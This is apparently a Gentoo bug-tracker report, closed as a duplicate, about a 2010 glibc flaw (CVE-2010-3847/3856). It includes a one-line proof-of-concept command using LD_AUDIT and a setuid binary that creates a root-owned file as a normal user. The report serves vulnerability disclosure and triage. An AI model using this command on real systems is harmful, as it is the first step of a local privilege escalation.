Announced on the Funtoo forums was a security hole in glibc. The test for the vulnerability was to enter this into the terminal as a normal user:

    umask 0 && LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="lolwhat" /bin/mount

And if one is on an affected system, there would appear a file "lolwhat" that is owned by root. I've tried this on Gentoo with sys-libs/glibc-2.11.2 and this also affects Gentoo.

Reproducible: Always

Steps to Reproduce:
1. Open up terminal
2. As a normal user, run this in the terminal:
    umask 0 && LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="lolwhat" /bin/mount
3. ls -l lolwhat

Actual Results:
A file is created, and it is owned by root.

Expected Results:
Not sure... I'm assuming nothing should happen.

CVE-2010-3847 and CVE-2010-3856 were mentioned in the Funtoo announcement.
http://seclists.org/fulldisclosure/2010/Oct/257
http://seclists.org/fulldisclosure/2010/Oct/344

Please search next time, security bugs are often duplicated! Thanks in advance.

*** This bug has been marked as a duplicate of bug 341755 ***